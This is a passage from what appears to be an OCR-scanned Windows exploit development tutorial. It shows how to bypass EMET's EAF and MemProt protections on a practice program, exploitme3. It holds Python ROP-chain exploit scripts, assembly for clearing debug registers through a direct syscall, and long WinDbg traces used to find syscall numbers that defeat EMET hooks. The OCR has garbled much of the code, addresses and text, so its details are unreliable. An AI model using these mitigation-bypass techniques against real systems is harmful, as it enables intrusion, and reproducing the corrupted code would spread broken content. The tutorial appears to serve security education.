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All we need to know is that to disable the breakpoints we can just clear the debug registers. Indeed, if you 
load in WinDbg and look at the debug registers before EMET modify them, you'll see the 
following: 


0:000» rM 20 
9г0=00000000 аг1-00000000 аг2-00000000 
4:3-00000000 агб-00000000 аг/-00000000 


ШО! агрроребиодегВгеак+ох2с: 
76131036 cc int 3 





Clearing the debug registers (1) 
Clearing the debug registers should be easy enough, right? Let's try it! 


We сап put {ће code to clear the debug registers right before our shellcode so that our shellcode can access 
the Export Directories with impunity. 


To generate the machine code, we can write the asm code in Visual Studio, debug the program and 
(right click on an assembly instruction). From there, we can copy and paste the code in 
PyCharm and edit the code a bit. 


Here’s the result: 
Python 


im p 


n 
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= 0x73c60000 
- 0x70480000 | 


create rop chain( 
[ idgets = | 

md + 0x7053fc6f, 

| + Ox7O53fcof, 

md + Ox704fO00f6, 


+ 0x704b6580, 
0х00000040, 
id + Ox7049f8cb, 
id + 0x705658f2, 
id + 0x7048f95c, 
id + 0x7048f607, 
id + 0х704ер436, 
| 50х70493а17, 
+ 0x7053b8fb, + 
+ 0х705651а4, 
| + 0х7053р 719, 
+ 0x704b7e5d, 


write file(fi 


1 | 


+ 0x70481607 
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(r'c:\deleteme\name.dat') 


If we execute exploitme3 we get a glorious crash! 


Let's open it in Пат and hit F5 (go). The execution should stop because of a single step exception. То 
ignore these annoying exceptions, we can tell WinDbg to ignore first-chance single step exceptions with the 
following command: 


sxd sse 


where sse stands for Single Step Exception. 


Right after we hit F5 again, another exception is generated and we recognize our code: 


0034d64a 0f23cO0 exception generated here 
0034d64d 0f23c8 dr1,eax 
00344650 0f23d0 dr2,eax 


00344653 012348 dr3,eax 
00340656 012310 dr6,eax 
00344659 012318 dr7,eax 





The problem is that we can’t modify the debug registers in user mode (ring 3). The only way to do it is to 
delegate this task to the OS. 


Clearing the debug registers (2) 
| googled for “mov drO privileged instruction" and | found this page: 


http://www.symantec.com/connect/articles/windows-anti-debug-reference 


There, we can find a method to modify the debug registers. The method consists in defining an exception 
handler and generating an exception such as a division by zero. When the exception is generated, Windows 
will call the exception handler passing it a pointer to a CONTEXT data structure as first and only argument. 
The CONTEXT data structure contains the values of the registers when the exception was generated. The 
handler can modify the values in the CONTEXT data structure and, after the handler returns, Windows will 
propagate the changes to the real registers. This way, we can change the debug registers. 
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Here’s the code found on that page: 
Assembly (x86) 


h offset I 
h dword ptr fs:[0] 


у ecx, [esp*OCh] ;skip с 
dword ptr [ecx4 -0B8h], 2 
/ dword ptr [ecx+04h], 0 
/ dword ptr [ecx+08h], 0 
/ dword ptr [ecx* OCh], 0 
/ dword ptr [ecx-* 10h], 0 
/ dword ptr [ecx* 14h], 0 
/ dword ptr [ecx-* 18h], 0 
eax, eax 


And here's our С/С++ code: 
С++ 


#include <Windows.h> 
#include <winnt.h> 
#include <stdio.h> 


nt main() { 
CONTEXT context; 
(context)); 
&context. ContextFlags - (int)&context); 
E , CONTEXT | DEBUG | REGISTERS); 





call here 
here: 
add dword ptr [esp], 0x22 
push  dword ptr 15:[0] 
mov  fs:[0], esp 
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pop  dword ptr fs:[0] 
add  esp,4 
jmp skip 


handler: 

mov ecx, [esp + ОСН]; skip div 

add dword ptr [ecx + OB8h], 2 

eax, eax 

том  dword ptr [ecx + 04h], eax 

mov dword ptr [ecx + 08h], 0x11223344 

том  dword ptr [ecx + ОСН], eax 

mov  dword ptr [ecx + 10h], eax 

mov  dword ptr [ecx + 14h], eax 

mov dword ptr [ecx + 18h], eax 

ret 
skip: 
} 
context.ContextFlags = CONTEXT DEBUG REGISTERS; 
GetThreadContext(GetCurrentThread(), &context); 
if (context.Dr1 == 0x11223344) 

printf("Everything OK!\n"); 

printf("Something's wrong :(\n"); 


1 0: 





The first part prints the offsets of and the debug registers so that we can verify that the offsets in the 
asm code are correct. Then follows the actual code. Note that we assign to just for 
debugging purposes. At the end, we use to make sure that our method works. 


This program won't run correctly because of 


Indeed, Visual Studio gives us the following warning: 


1>c:\users\kiuhnm\documents\visual studio 2013\projects\tmp\tmp\tmp1 .срр(24): warning C4733: Inline asm assigning їо 'F 


S:0' : handler not registered as safe handler 





Let's disable SAFESEH by going to ян, апа modifying the configuration for as 
follows: 
• Configuration Properties 
о Linker 
. Advanced 
. : No ((SAFESEH:NO) 
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Now the program should work correctly. 


We won't have problems with SAFESEH when we put that code in our shellcode because our code will be 
on the stack and not inside the image of 


Here's the Python script to create 
Python 


- 0x73c60000 
- 0х70480000 _ 


def create rop chain( 
dgets = | 
+ Ox7053fc6f, 7 
+ Ox7053fc6f, 7 
+ 0х70410016, 


+ 0x704b6580, 
0x00000040, 
md + 0x7049f8cb, + 

| + 0x70565812, 

+ 0x7048f95c, 

| + 0х70481607, 
+ 0x704eb436, 
+ 0x70493a17, 
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md + 0x7053b8fb, 
0x705651a4, 

nd + 0x7053b7f9, 
+ 0x704b7e5d, 


+ Ox704 


МОЋ! МƏ 1 АХуд / моћ 


| 
WODI TU J т \ 10) ОМ 


хоб 
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le(r'c:\deleteme\name.dat') 


If we run exploitme3, we get a crash. Maybe we did something wrong? 


Let’s debug the program in WinDbg. We open exploitme3.exe in WinDbg and then we press F5 (go). We get 
the familiar single step exception so we issue the command sxd sse and hit F5 again. As expected, we get 
an Integer divide-by-zero exception: 

(610.a58): Integer divide-by-zero - code с0000094 (first chance) 

First chance exceptions are reported before any exception handling. 

This exception may be expected and handled. 

еах=00000000 ерх=0000017с ecx=89dd0000 edx=0021ddb8 esi=73c73a17 edi=73c6f607 

eip=0015d869 еѕр=00154844 ebp=73d451a4 iopl=0 nv up ei pl zr na pe nc 

cS-0023 ss-002b ds-002b es-002b fs-0053 gs-002b ей-00010246 

0015d869 1710 div eax,eax 





This is a first chance exception so if we press F5 (go) again, the exception will be passed to the program. 
Before proceeding, let's examine the exception chain: 


0:000> !exchain 
0015d844: 0015d877 
0015#50: exploitme3! except Пап ег4-0 (00381739) 
CRT scope 0, filter: exploitme3!  tmainCRTStartup-*115 (003812ca) 
func: exploitme3! . tmainCRTStartup-* 129 (003812de) 
0015ff9c: ntdll! except_handler4+0 (76107115) 
CRT scope 0, filter: ntdll!  RtlUserThreadStart*2e (76107440) 
func: ntdl! — RtlUserThreadStart*63 (76f090eb) 





Everything seems correct! 


When we hit F5 (go) we get this: 


(610.a58): Integer divide-by-zero - code c0000094 (!!! second chance !!!) 
еах=00000000 ерх-0000017с есх-89440000 едх-00214408 еѕі=73с7За17 еаг-73с6(607 


еір=00154869 еѕр=00154844 ебр=739451а4 iopl=0 nv up ei pl zr па ре nc 
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cs=0023 ss-002b ds=002b es=002b fs=0053 gs=002b efl=00010246 


00154869 YA 0) div eax,eax 





Why doesn't the program handle the exception? The culprit is SafeSEH! 


| forgot that it's not enough for a handler not to be in a SafeSEH module: it mustn't be on the stack either! 


Clearing the debug registers (3) 


SafeSEH may be bypassed but probably not without using some hardcoded addresses, which defeats the 
purpose. 


| want to add that if we hadn't reserved more space on the stack by allocating on the stack the array 
(see the initial C/C++ source code), our shellcode would’ve overwritten the exception chain and 
SEHOP would’ve stopped our exploit anyway. SEHOP checks that the exception chain ends with 
. We can’t restore the exception chain if we don’t know the address of that handler. 
So, this path is not a viable one. 


Another way to clear the debug registers is to use . While it’s true that we don’t 
have the address of such function, we shouldn't give up just yet. We know that can't clear 
the debug registers in user mode so it must call some service at some point. 

Ring 0 services are usually called through interrupts or specific CPU instructions like (Intel) and 


(AMD). Luckily for us, these services are usually identified by small constants which are 
hardcoded in the OS and thus don't change with reboots or even with updates and new service packs. 


Let's start by writing a little program in C/C++: 
С++ 


#include <Windows.h> 
#include <stdio.h> 


int main() { 

CONTEXT context; 

context.ContextFlags = CONTEXT DEBUG REGISTERS; 
context.DrO = 0; 

context.Dr1 = 0; 

context.Dr2 = 0; 

context.Dr3 = 0; 

context.Dr6 = 0; 

context.Dr7 = 0; 


if (ISetThreadContext(GetCurrentThread(), &context)) 
printf("Error!\n"); 


| printf("OK!\n"); 


0; 
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Now let's debug it in WinDbg. Put a breakpoint on kernel32!SetThreadContext and hit F5 (go). 


SetThreadContext is very short: 


kernel32!SetThreadContext: 

76435843 8bff mov  edi,edi 

764358d5 55 push ебр 

764358а6 8bec mov  ebp,esp 

764358d8 ff750c push dword ріг [ebp+0Ch] 


764358db #7508 push dword ptr [ebp+8] 


002df954 = &context 
Ох е = GetCurrentThread() 


764358de ff15f8013b76 call dword ptr [kernel32! imp — NtSetContextThread (763b01f8)] 
764358e4 85с0 test eax,eax 
764358e6 7d0a jge kernel32!SetThreadContext+0x1f (764358f2) 


764358e8 50 push еах 


764358е9 e846bdf7ff call kernel32!BaseSetLastNTError (76361634) 


764358ее 33c0 хог  eax,eax 


764358f0 ебоз jmp kernel32! SetThreadContext+0x22 (764358f5) 


76435812 33с0 хог еах,еах 
76435814 40 inc eax 
764358f5 5d pop  ebp 
764358f6 c20800 ret 8 





Note the two parameters passed to the first call. Clearly, we want to step inside that call: 


ntdll!ZwSetBootOptions: 

76eb1908 b84f010000 mov eax,14Fh 
76eb190d 33c9 хог есх,есх 

76eb190f 88542404 lea | едх,[езр+4] 
76eb1913 64ff15c0000000 call dword ptr fs:[OCOh] 
76eb191a 83c404 add  esp,4 

76eb191d c20800 ret 8 


ntdll!ZwSetContextThread: we are here! 
76eb1920 850010000 тоу eax,150h 

76eb1925 33c9 xor есх,есх 

76eb1927 8d542404 lea | edx|[esp*4] 
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76eb192b 64415с0000000 call dword ptr 15:[0С0ћ] 
76eb1932 83c404 add esp,4 

76eb1935 c20800 ret 8 
ntdil!NtSetDebugFilterState: 

76eb1938 5851010000 тоу eax,151h 
76eb193d b90a000000 mov ecx,0Ah 


76eb1942 84542404 lea edx,[esp+4] 
76eb1946 64ff15c0000000 call dword ptr fs:[OCOh] 
76eb194d 83c404 add еѕр,4 

76eb1950 c20c00 ret OCh 

76eb1953 90 пор 





This looks very interesting! What is this call? Above and below we can see other similar functions with 
different values for EAX. EAX might be the service number. The immediate value of the ret instruction 
depends on the number of arguments, of course. 


Note that edx will point to the two arguments on the stack: 


0:000» dd edx L2 
O02df93c fffffffe 00241954 





Let's step into the call: 


747е2320 ea1e277e743300 jmp 0033:747Е271Е 


A far jump: how interesting! When we step on it we find ourselves right after the call instruction: 


ntdli'ZwQueryInformationProcess: 
76eafad8 60816000000 том еах,16бһ 
76eafadd 33c9 хог есх,есх 
тбеатаа! 84542404 lea еях,[еѕр+4] 


тбеаїаеЗ 64#15с0000000 call амога ptr #:[0Соһ] 
76eafaea 83c404 add  esp,4 we are here! 
76eafaed с21400 ret 14h 





Why does this happen and what's the purpose of a far jump? Maybe it's used for transitioning to 64-bit 
code? Repeat the whole process in the 64-bit version of WinDbg and the jump will lead you here: 
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wow64cpu!CpupReturnFromSimulatedCode: 

00000000`747е271е 67448b0424 тоу r8d,dword ptr [esp] ds:00000000°0037f994=76eb1932 
00000000`747е2723 458985bc000000 mov — dword ptr [r13+0BCh],r8d 

00000000`747е272а 4189а5с8000000 mov dword ptr [r13+0C8h],esp 


00000000`747е2731 498ba42480140000 том _rsp,qword ptr [r12+1480h] 
00000000`747е2739 4983а4248014000000 and qword ptr [r12+1480h],0 
00000000:747е2742 448bda том г11а,еах 





We were right! If we keep stepping we come across the following call: 


00000000`747е276е 8bc8 mov ecx,eax 
00000000`747е2770 #1 50ае9## call qword ptr [wow64cpu!_imp_Wow64SystemServiceEx (00000000`747е1080)] 





Note that ecx is 150, our service number. We don't need to go so deep. Anyway, eventually we reach the 
following code: 

ntdll!NtSetInformationThread: 

00000000°76d01380 4c8bd1 mov 110,rcx 

00000000 76401383 b80a000000 тоу eax,0Ah 


00000000°76d01388 Of05 syscall 
00000000°76d0138a сз ret 





So, to call a ring 0 service there are two transitions: 


1: from 32-bit ring 3 code to 64-bit ring 3 code 
2. from 64-bit ring 3 code to 64-bit ring 0 code 


But we don't need to deal with all this. All we need to do is: 


set EAX = 0x150 

clear ECX 

make EDX point to our arguments 
call the code pointed to by fs:[0xcO] 


= cs 


As we can see, this code is not susceptible to ASLR. 
Now we can finally write the code to clear the debug registers: 
Assembly (x86) 


m , 150h 
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есх, есх 
esp, 2cch 
dword ptr [esp], 10010h 
dword ptr [esp + 4], ecx 
dword ptr [esp + 8], ecx 
dword ptr [esp + Och], ecx 
dword ptr [esp + 10h], ecx 
dword ptr [esp + 14h], ecx 
dword ptr [esp + 18h], ecx 
esp 
Offfffffeh 

г едх, esp 

il — dword ptr fs : [OCOh] 

esp, 4 * 2cch * 8 
































At the end of the code, we restore but that's not strictly necessary. 
Here’s the complete Python script: 
Python 


r120 = 0x73c60000 


- 0x70480000 


def create rop chain( 
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+ Ox7053fcef, 
+ Ox7053fcef, 
+ 0х704(00(6, #Р 


| + 0x704b6580, 
0х00000040, )) 
+ 0х7049#8ср, 3 
| + 0x705658f2, 
id + 0х7048#95с, 
| + 0х7048#607, 3 
id + 0х704ер436, 
| + 0x70493a17, 
| + 0x7053b8fb, 
id + 0х705651а4, 
id + 0x7053b7f9, 
| + 0x704b7e5d, 


y!) 
527 


81607 


asi 
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"\x89\x4C\x24\x18" + 





nrite_file(r'c:\deleteme\name.dat') 


If we run exploitme3.exe, the calculator pops up! We bypassed EAF! We can also enable EAF+. Nothing 
changes. 


MemProt 


In our exploit we use VirtualProtect to make the portion of the stack which contains our shellcode executable. 
MemProt should be the perfect protection against that technique. Let’s enable it for exploitme3.exe. As 
expected, when we run exploitme3.exe, MemProt stops our exploit and exploitme3 crashes. 


Let's see what happens in WinDbg. Open exploitme3.exe in WinDbg and put a breakpoint on exploitme3!f. 
Then step through the function f and after the ret instruction we should reach our ROP code. Keep stepping 
until you get to the jmp to VirtualProtect. 


Here, we see something strange: 


kernel32!VirtualProtectStub: 

763b4327 e984c1b5cO jmp  36f104b0 is this a hook? 
763b432c 5d pop  ebp 

763b432d e996cdffff jmp  kernel32!VirtualProtect (763b10c8) 

763b4332 8b0e mov ecx,dword ptr [esi] 

763b4334 8908 mov  dword ptr [eax],ecx 

763b4336 8b4e04 mov  ecx,dword ptr [esi+4] 

763b4339 894804 mov  dword ptr [eax+4],ecx 

763b433c e9e9eaffff jmp kernel32!LocalBaseRegEnumKey+0x292 (763b2e2a) 
76304341 8b85dOfeffff mov еах,амога ptr [ebp-130h] 





The function starts with a jmp! Let’s see where it leads us to: 


36f104b0 83ec24 sub  esp,24h 
36f104b3 68e88b1812 push 12188BE8h 


36f104b8 684020870 push offset EMETIEMETSendCert+0xac0 (70812040) 
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36110404 68d604f136 push 36F104D6h 
36f104c2 6804000000 push 4 
36f104c7 53 push ебх 

36f104c8 60 pushad 

36f104c9 54 push esp 


36f104ca e8816c9a39 са! EMET+0x27150 (70857150) 
36f104cf 61 рораа 

36110440 83c438 add евр,38һ 

36f104d3 c21000 ret 10h 





OK, that's EMET. That jmp is a hook put there by EMET to intercept calls to VirtualProtect. 


We can see that if it weren't for the hook, the VirtualProtectStub would call kernel32!VirtualProtect. Let's 
have a look at it: 


0:000» и kernel32!VirtualProtect 

kernel32!VirtualProtect: 

763b10c8 ff2518093b76 jmp  dword ptr [kernel32! imp VirtualProtect (763b0918)] 
763b10ce 90 пор 

763b10cf 90 пор 

763b10d0 90 nop 

763b10d1 90 nop 

763b10d2 90 nop 

kernel32!WriteProcessMemory: 

763b10d3 ff251c093b76 jmp  dword ptr [kernel32!_ imp — WriteProcessMemory (763b091c)] 
763b10d9 90 nop 





That's just a redirection which has nothing to do with EMET: 


0:000> и poi(763b0918) 
KERNELBASE!VirtualProtect: 
7625efc3 e9d815cbcO jmp  36f105a0 another hook from EMET 


7625efc8 #7514 push dword ptr [ebp+14h] 
7625efcb #7510 push dword ptr [ebp+10h] 
7625efce #750с push dword ptr [ebp+0Ch] 
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7625efd1 #7508 push dword ptr [ebp+8] 
7625efd4 6aff push OFFFFFFFFh 


7625efd6 e8c1feffff call KERNELBASE!VirtualProtectEx (7625ee9c) 
7625efdb 5d рор ерр 





Note the hook from ЕМЕТ. While VirtualProtect operates оп the current process, VirtualProtectEx lets you 
specify the process you want to work on. As we can see, VirtualProtect just calls VirtualProtectEx passing -1, 
which is the value returned by GetCurrentProcess, as first argument. The other arguments are the same as 
the ones passed to VirtualProtect. 


Now let's examine VirtualProtectEx: 


0:000» и KERNELBASEYVirtualProtectEx 

KERNELBASEYVirtualProtectEx: 

7625ее9с e97717cbcO jmp  36f10618 another hook from EMET 
7625eea1 56 ризћ esi 

7625ееа2 8b35c0112576 том  esi,dword ptr [КЕКМЕ ВАЗЕ! imp  NtProtectVirtualMemory (762511с0)] 
7625eea8 57 push edi 

7625eea9 #7518 push dword ptr [ebp- 18h] 

7625eeac 8d4510 lea  eax,[ebp+10h] 

7625eeaf #7514 push dword ptr [ebp+14h] 

7625eeb2 50 push eax 

0:000» u 

KERNELBASE! VirtualProtectEx+0x17: 

7625eeb3 8d450c lea eax,[ebp+OCh] 

7625eeb6 50 push eax 

7625еерт #7508 push dword ptr [ebp+8] 

7625eeba Наб call esi calls NtProtectVirtualMemory 
7625eebc 8bf8 mov  edi,eax 

7625eebe 85ff test edi,edi 

7625еес0 7c05 jl KERNELBASE!VirtualProtectEx+0x2b (7625eec7) 


7625eec2 33c0 xor  eax,eax 





Again, note the hook from EMET. VirtualProtectEx calls NtProtectVirtualMemory: 


0:000» и poi(KERNELBASE!_imp__NtProtectVirtualMemory) 
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ntdll!ZwProtectVirtualMemory: 

76eb0038 е9530606с0 jmp 36110690 this is getting old... 
76eb003d 33c9 хог  ecx,ecx 

76eb003f 8d542404 lea | edx|[esp*4] 

76eb0043 64ff15c0000000 call | dword ptr fs:[OCOh] 


тбеб004а 83с404 add еѕр,4 
76eb004d c21400 ret 14h 
ntdll!ZwQuerySection: 

76eb0050 b84e000000 тоу eax,4Eh 
76eb0055 33c9 хог есх,есх 





That looks quite familiar: ZwProtectVirtualMemory calls a ring 0 service! Note that the service number has 
been overwritten by EMET’s hook, but 0x4d would be a good guess since the service number of the next 
function is Ox4E. 


If you have another look at VirtualProtectEx, you'll see that the parameters pointed to by EDX in 
ZwProtectVirtualMemory are not in the same format as those passed to VirtualProtectEx. To have a closer 
look, let's disable MemProt, restart (Ctrl Shift- F5) exploitme3.exe in WinDbg and set the following 
breakpoint: 


bp exploitme3!f "bp KERNELBASE!VirtualProtectEx;g" 


This will break on the call to VirtualProtectEx executed by our ROP chain. We hit F5 (go) and we end up 
here: 

KERNELBASE! VirtualProtectEx: 

7625ee9c 8bff mov we are here! 

7625ее9е 55 push 

7625ee9f дрес mov 

7625ееа1 56 push 

7625eea2 8b35c0112576 том esi,dword ptr [KERNELBASE! |тр NtProtectVirtualMemory (76251 1c0)] 


7625eea8 57 push edi 

7625eea9 #7518 push dword ptr [ebp- 18h] 
7625eeac 8d4510 lea eax,[ebp+10h] 
7625eeaf 17514 push dword ptr [ebp+14h] 
7625eeb2 50 push eax 

7625eeb3 8d450c lea eax,[ebp+0Ch] 
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7625eeb6 50 push eax 
7625еерт #7508 push 01710140 ptr [ebp+8] 


7625eeba Наб call esi 





This time, as expected, there’s no hook. Here are our 5 parameters on the stack: 


address of our 
code on the stack PAGE EXECUTE READWRITE 


d esp&4 L5 
00334140 
00334150 


IpflOldProtect 
(writable location) 





Let's see what is put onto the stack: 


KERNELBASE! VirtualProtectEx: 

7625ee9c 8bff mov  edi,edi we are here! 

7625ее9е 55 push ебр 

7625ee9f 8bec mov  ebp,esp 

7625ееа1 56 push esi 

7625ееа2 8b35c0112576 том  esi,dword ptr [KERNELBASE! imp _ NtProtectVirtualMemory (76251 1c0)] 


7625eea8 57 push edi 

7625ееа9 #7518 push dword ptr [ebp+18h]  //IpflOldProtect (writable location) 
7625eeac 8d4510 lea eax,[ebp+10h] 

7625eeaf #7514 push dword ptr[ebp+14h] //РАСЕ EXECUTE READWRITE 
7625еер2 50 push eax II ptr to size 

7625eeb3 8d450c lea еах,[ерр+осһ] 





http://expdev-kiuhnm.rhcloud.com 





- 273 - 





EXPLOIT DEVELOPMENT COMMUNITY 


7625eeb6 50 push еах // ptr to address 
7625еерт #7508 push 01710140 ptr [ebp+8] П ОХЕ (current process) 


7625eeba Наб call esi 





Let's step into the call: 


ntdll!ZwProtectVirtualMemory: 

76eb0038 5844000000 mov eax,4Dh 
76eb003d 33c9 xor  ecx,ecx 

76eb003f 8d542404 lea | edx|[esp*4] 
76eb0043 64#15с0000000 call dword ptr fs:[OCOh] 
76eb004a 83c404 add еѕр,4 

76eb004d с21400 ret 14h 





EDX will point to the following 5 parameters in this order: 


Oxffffffff (current process) 

ptr to address 

ptr to size 
PAGE_EXECUTE_READWRITE 





IpflOldProtect (writable location) 


Here’s a concrete example: 


едх 


ЕЕЕЕЕЕЕЕ |0 





Before wasting our time with building а КОР chain that might not work, we should make sure that there 
aren't any other surprises. 
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An easy way to do this, is to debug exploitme3.exe with MemProt enabled and overwrite the EMET’s hooks 
with the original code. If everything works fine, then we're ready to proceed. l'Il leave you this as an exercise 


(do itl). 
Building the ROP chain 


Even though we want to call a kernel service the same way we did for clearing the debug registers, this time 
it'll be much harder because we need to do this with ROP gadgets. 


The main problem is that msvcr120.dll doesn't contain any call dword ptr fs:[OCOh] or variation of it such as 
call fs:[eax] or call fs:eax. We know that in ntdll there are lots of these calls so maybe we can find a way to 
get the address of one of them? 


Let's have a look at the IAT (Import Address Table) of msver120.dll: 


0:000» !dh msvcr120 


File Type: DLL 
FILE HEADER VALUES 
14C machine (i386) 


5 number of sections 


524F7CE6 time date stamp Sat Oct 05 04:43:50 2013 


0 file pointer to symbol table 

0 number of symbols 

EO size of optional header 

2122 characteristics 

Executable 
App can handle >2gb addresses 
32 bit word machine 
DLL 


OPTIONAL HEADER VALUES 
10B magic £ 
12.00 linker version 
DC200 size of code 
0С00 size of initialized data 


0 size of uninitialized data 
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11A44 address of entry point 
1000 base of code 


73c60000 image base 
1000 section alignment 
200 file alignment 
2 subsystem (Windows GUI) 
6.00 operating system version 
10.00 image version 
6.00 subsystem version 
22000 size of image 
400 size of headers 
FB320 checksum 
00100000 size of stack reserve 
00001000 size of stack commit 
00100000 size of heap reserve 
00001000 size of heap commit 
140 DLL characteristics 
Dynamic base 
NX compatible 
1860 [ CEDO] address of Export Directory 
Е52ВС [ 28] address of Import Directory 
E7000[ 3E8] address of Resource Directory 
of 0] address of Exception Directory 
E9200 [ 3EA0] address of Security Directory 
E8000 [ 5D64] address of Base Relocation Directory 
00140[ 38] address of Debug Directory 
Of 0] address of Description Directory 
of 0] address of Special Directory 


Of 0] address of Thread Storage Directory 
19Е48[ 40] address of оаа Configuration Directory 


Of 0] address of Bound Import Directory 
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E5000 0 2BCJaddress of Import Address Table Directory < 
Of 0] address of Delay Import Directory 
Of О] address of COR20 Header Directory 


of 0] address of Reserved Directory 


[...] 


0:000» аав твусг120-Е5000 L 2bc/4 

73d45000 76ed107b ntdll!RtIEncodePointer 

73d45004 76ec9dd5 ntdll!RtIDecodePointer 

73945008 763b586e kernel32!RaiseExceptionStub 
73d4500c 763b11c0 kernel32!GetLastErrorStub 
73445010 76367948 kernel32!F SPErrorMessages::CMessageMapper::StaticCleanup+0xc 
73d45014 763b3470 kernel32!GetModuleHandleWStub 
73d45018 763b4a37 kernel32!GetModuleHandleExWStub 
73d4501c 76361222 kernel32! GetProcAddressStub 
73445020 76434611 kernel32!AreFileApisANSIStub 
73d45024 763b18fa kernel32!MultiByteToWideCharStub 
73045028 763b16d9 kernel32!WideCharToMultiByteStub 
73d4502c 763b5169 kernel32! GetCommandLineAStub 
73945030 763b51eb kernel32!GetCommandLineWStub 
73045034 76361420 kernel32!GetCurrentThreadldStub 
73045038 76eb22c0 ntdll!RtlEnterCriticalSection 
73d4503c 76eb2280 ntdll!RtlLeaveCriticalSection 
73945040 76ec4625 ntdll!RtIDeleteCriticalSection 
73d45044 763b1481 kernel32!GetModuleFileNameAStub 
73945048 763b11a9 kernel32!SetLastError 

73d4504c 763b17b8 kernel32! GetCurrentThreadStub 
73045050 763b4918 kernel32! GetModuleFileNameWStub 
73945054 763b51fd kernel32!IsProcessorFeaturePresent 
73445058 763b517b kernel32!GetStdHandleStub 
73d4505c 763b1282 kernel32!WriteFilelmplementation 
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73d45060 
73d45064 
73d45068 
73d4506c 
73d45070 
73d45074 
73d45078 
73d4507c 
73d45080 
73d45084 
73d45088 
73d4508c 
73d45090 
73d45094 
73d45098 
73d4509c 
73d450a0 
73d450a4 
73d450a8 
73d450ac 
73d450b0 
73d450b4 
73d450b8 
73d450bc 
73d450c0 
73d450c4 
73d450c8 
73d450cc 
73d450d0 
73d450d4 
73d450d8 
73d450dc 


763b440a kernel32!FindCloseStub 

7643471 kernel32!FindFirstFileExAStub 
763dd52e kernel32!FindNextFileAStub 
763c17d9 kernel32!FindFirstFileExWStub 
763b54b6 kernel32!FindNextFileWStub 
763b13e0 kernel32!CloseHandlelmplementation 
763b3495 kernel32!CreateThreadStub 

76ee80 1c ntdll!'RtlExitUserThread 

763b43b7 kernel32!ResumeThreadStub 
763b4925 kernel32!LoadLibraryExW Stub 
763d0622 kernel32!SystemTimeToTzSpecificLocalTimeStub 
763b53f4 kernel32!FileTime ToSystemTimeStub 
76434871 kernel32!GetDiskFreeSpaceAStub 
76365339 kernel32!GetLogicalDrivesStub 
763b1acc kernel32!SetErrorModeStub 
76425610 kernel32!Beeplmplementation 

763b1 Off kernel32!SleepStub 

763be289 kernel32!GetFullPathNameAStub 
763b11f8 kernel32!GetCurrentProcessldStub 
763b453c kernel32!GetFileAttributesExW Stub 
763cd4c7 kernel32!SetFileAttributesW Stub 
763b409c kernel32! GetFullPathNameWStub 
763b4221 kernel32!CreateDirectoryW Stub 
763c9b05 kernel32!MoveFileExW 

76434a0f kernel32! RemoveDirectoryW Stub 
76364153 kernel32! GetDriveT ypeW Stub 
763b897b kernel32! DeleteFileW Stub 

763be2f9 kernel32! SetEnvironmentVariableAStub 
763с17 {с kernel32! SetCurrentDirectoryAStub 
763dd4e6 kernel32!GetCurrentDirectoryAStub 
763c1228 kernel32!SetCurrentDirectoryWStub 
763b55d9 kernel32! GetCurrentDirectoryWStub 
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73d450e0 763b89b9 kernel32!SetEnvironmentVariableW Stub 
73d450e4 763b1136 kernel32!WaitForSingleObject 

73d450e8 763c1715 kernel32! GetExitCodeProcessImplementation 
73d450ec 763b1072 kernel32! CreateProcessA 

73d450f0 763b3488 kernel32!FreeLibraryStub 

73d450f4 763b48db kernel32!LoadLibraryExAStub 

73d450f8 763b103d kernel32!CreateProcessW 

73d450fc 763b3e93 kernel32!ReadFilelmplementation 
73945100 763d273c kernel32! GetTempPathA 

73945104 763cd4ac kernel32!GetTempPathW 

73945108 76361852 kernel32!DuplicateHandlelmplementation 
73d4510c 76361795 kernel32! GetCurrentProcessStub 
73045110 763b34c9 kernel32! GetSystemTimeAsFileTimeStub 
73945114 763b4622 kernel32!GetTimeZonelnformationStub 
73d45118 763b5a6e kernel32!GetLocalTimeStub 

73d4511c 763dd4fe kernel32!LocalFileTimeToFileTimeStub 
73045120 763cec8b kernel32!SetFileTimeStub 

73945124 763b5a46 kernel32!SystemTimeToFileTimeStub 
73d45128 76434a6f kernel32!SetLocalTimeStub 

73d4512c 76ec47a0 ntdll!RtlInterlockedPopEntrySList 
73045130 76ec27b5 ntadll!RtlinterlockedFlushSList 

73945134 76ec474c ntdll!RtlQueryDepthSList 

73445138 76ec4787 ntdll!RtlinterlockedPushEntrySList 
73d4513c 763db000 kernel32! CreateTimerQueueStub 
73d45140 763b1691 kernel32!SetEventStub 

73d45144 76361151 kernel32!WaitForSingleObjectExImplementation 
73d45148 7643ebeb kernel32!UnregisterWait 

73d4514c 763b1160 kernel32!TlsGetValueStub 

73945150 763cf874 kernel32!SignalObjectAndWait 

73045154 763b14cb kernel32!TIsSetValueStub 

73045158 763b327b kernel32!SetThreadPriorityStub 
7384515с 7643462b kernel32! ChangeTimerQueueTimerStub 
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73d45160 763cf7bb kernel32!CreateTimerQueueT imerStub 
73d45164 76432482 kernel32!GetNumaHighestNodeNumber 
73d45168 763dcaf5 kernel32!RegisterWaitForSingleObject 
73d4516c 76434ca1 kernel32!GetLogicalProcessorlnformationStub 
73945170 763ccd9d kernel32!RtlCaptureStackBackTraceStub 
73045174 763b4387 kernel32!GetThreadPriorityStub 
73d45178 763ba839 kernel32!GetProcessAffinityMask 
73d4517c 763d0570 kernel32!SetThreadAffinityMask 
73045180 763b4975 kernel32!TIsAllocStub 

73d45184 763cf7a3 kernel32!DeleteTimerQueueTimerStub 
73d45188 76303547 kernel32!TlsFreeStub 

73d4518c 763cefbc kernel32!SwitchToThreadStub 

73445190 76ec2540 ntdll'RtlTryEnterCriticalSection 
73045194 7643347с kernel32!SetProcessAffinityMask 
73045198 763b183a kernel32!VirtualFreeStub 

73d4519c 763b1ab1 kernel32!GetVersionExWStub 
73d451a0 76301822 kernel32!VirtualAllocStub 

73d451a4 763b4327 kernel32!VirtualProtectStub 

73d451a8 76ec9514 ntdll!RtlinitializeSListHead 

73d451ac 763cd37b kernel32!ReleaseSemaphoreStub 
73d451b0 763db901 kernel32!UnregisterWaitExStub 
73d451b4 763b48f3 kernel32!LoadLibraryW 

73d451b8 763dd1c4 kernel32!OutputDebugStringWStub 
73d451bc 763cd552 kernel32!FreeLibraryAndExitThreadStub 
73d451c0 76361245 kernel32! GetModuleHandleAStub 
73d451c4 7643592b kernel32!GetThreadTimes 

73d451c8 763b180a kernel32! CreateEventWStub 

73d451cc 763b1912 kernel32!GetStringTypeWStub 
73945190 763b445b kernel32!IsValidCodePageStub 
73d451d4 763b1768 kernel32!GetACPStub 

73d451d8 763dd191 kernel32!GetOEMCPStub 

73d451dc 76365151 kernel32! GetCPInfoStub 
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73d451e0 763dd1b3 kernel32!RtlUnwindStub 

